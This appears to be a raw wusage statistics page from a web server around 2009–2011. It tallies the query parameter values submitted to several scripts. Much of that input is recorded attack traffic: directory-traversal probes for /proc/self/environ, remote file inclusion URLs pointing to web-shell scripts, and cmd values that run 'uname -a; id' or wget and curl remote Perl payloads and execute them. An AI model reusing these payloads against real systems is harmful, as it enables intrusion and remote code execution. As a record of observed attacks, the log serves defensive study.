http://mail.tu-varna.bg/bitch.txt??? 2
OTHER: 714
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
125 1
Parameter amp;option
ValueAccesses
com_gcalendar 1
OTHER: 726
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://lopsp.hostinggratisargentina.com/scan? 2
OTHER: 726
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
100
../../../../../../../../../../../../../../../proc/self/envir
on
61
..//..//..//..//..//..//..//..///proc/self/environ 00 33
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
3
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p
roc/self/environ
2
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../
proc/self/environ
1
Parameter option
ValueAccesses
com_fabrik 9
com_ccnewsletter 8
com_rokdownloads 3
com_gcalendar 2
Parameter task
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
6
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
1
Parameter view
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
11
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
5
OTHER: 483
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.asilturkler.net/linxscan.txt? 2
http://www.kcdesi.com/cmd.txt? 2
http://www.7s-softball.com/modules/tinycontent/content/load.
txt??
2
http://telkomsex.com/ec.txt? 2
http://koppp.iespana.es/jkk? 2
http://crewbx.12gbfree.com/bitch? 2
http://www.corsemusique.com/portail/agenda/config/tester.txt
?
2
http://usuarios.arnet.com.ar/adrikrasnow/test.txt? 2
http://freewebs.com/0m4rc170/asd.txt?? 2
http://freewebs.com/0m4rc170/zip.txt?? 2
Parameter CONFIG_EXT[LANGUAGES_DIR]h
ValueAccesses
http://hackerzo-team.com/m4d/c99.txt? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://breakthru.us/images/safe/saf
e.txt?
ValueAccesses
2
Parameter CONFIG_EXT[LANGUAGES_DIR]http://callingplanetearth.org/g00d.
zip?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://callingplanetearth.org/sad.g
if?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://helsedepotet.dk/components/c
om_expose/expose/img/thumbs/2?
ValueAccesses
11
Parameter CONFIG_EXT[lang]
ValueAccesses
http://www.newhavenkoreanchurch.com/bbs/data/crotz? 1
Parameter cmd
ValueAccesses
uname -a; id 6
id 4
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1.
txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.kcdesi.com/ip1.txt;wget http://www.kcdesi.com/ros1
.txt;wget http://www.kcdesi.com/scanasc.txt;curl -o ip1.txt
http://www.kcdesi.com/ip1.txt;curl -o ros1.txt http://www.kc
desi.com/ros1.txt;curl -o scanasc.txt http://www.kcdesi.com/
scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.txt
2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
rm spriter1.txt;wget http://www.hobbiz.com/UP/spriter1.txt;c
url -o spriter1.txt http://www.hobbiz.com/UP/spriter1.txt;pe
rl spriter1.txt
1
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U
P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP
/spriter1.txt;perl spriter1.txt
1
Parameter config_ext[languages_dir]
ValueAccesses
1
Parameter http://mynchn.ms.kr/bbs//include/.r/ins.c??
ValueAccesses
1
OTHER: 670
ScriptTotal Accesses
/wusage/monthly/2011/04/01/ 716
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 2
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
94
../../../../../../../../../../..//proc/self/environ 00 87
..//..//..//..//..//..//..//..///proc/self/environ 00 78
../../../../../../../../../../..//proc/self/environ 00 30
../../../../../../../../../../../../../../../proc/self/envir
on
18
..//..//..//..//..//..//..//..///proc/self/environ 13
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
9
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../
/proc/self/environ
5
../../../../../../../../../../../../..//proc/self/environ 00
5
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p
roc/self/environ
5
Parameter option
ValueAccesses
com_google 202
com_rokdownloads 55
com_juser 40
com_spsnewsletter 16
com_gcalendar 12
com_rwcards 12
com_ccnewsletter 8
com_fabrik 4
com_myblog 3
com_product 3
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 1
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
1
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
1
Parameter view
ValueAccesses
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
1
../../../../../../../../../../../../../../../proc/self/envir
on
1
OTHER: 10
ScriptTotal Accesses
/wusage/weekly/2011/05/08/ 712
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
125 25
12 3
Parameter amp;option
ValueAccesses
com_gcalendar 25
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 25
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
101
../../../../../../../../../../..//proc/self/environ 00 53
..//..//..//..//..//..//..//..///proc/self/environ 00 32
..//..//..//..//..//..//..//..///proc/self/environ 25
../../../../../../../../../../..//proc/self/environ 00 24
../../../../../../../../../../../../..//proc/self/environ 00
19
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ 00
16
../../../../../../../../../../../../../../../proc/self/envir
on
15
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
13
..//..//..//..//..//..//..//..//..//..//..//..//proc/self/en
viron
8
Parameter custompluginfile[]
ValueAccesses
http://bayostudio.es/intro//wp-content/themes/classic/id.txt
???
3
Parameter option
ValueAccesses
com_google 171
com_rokdownloads 80
com_gcalendar 20
com_ccnewsletter 14
com_goole 10
com_product 5
com_myblog 3
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 2
../../../../../../../../../../..//proc/self/environ 00 1
Parameter view
ValueAccesses
../../../../../../../../../../../../..//proc/self/environ 00
2
OTHER: 17
ScriptTotal Accesses
/wusage/weekly/2009/10/18//// 708
Parameters by Submitted Value
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://phamsight.com/docs/images/head?? 24
http://alandar.net/www2/log1.txt? 16
|echo "casper";echo "kae";| 15
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt?? 12
http://190.12.77.105:83/fx29id1.txt? 11
http://www.fileden.com/files/2009/3/30/2385100/pirates1.txt?
11
http://zerozon.co.kr/photos/count/id1.txt??? 10
http://musicadelibreria.net/footer?? 10
http://nic.bupt.edu.cn/media/j1.txt?? 9
http://iimc-consultingclub.com/error/fx29id1.txt???? 9
Parameter path
ValueAccesses
http://www.noin9191.com/ams/ammember/fx29id1.txt? 1
OTHER: 580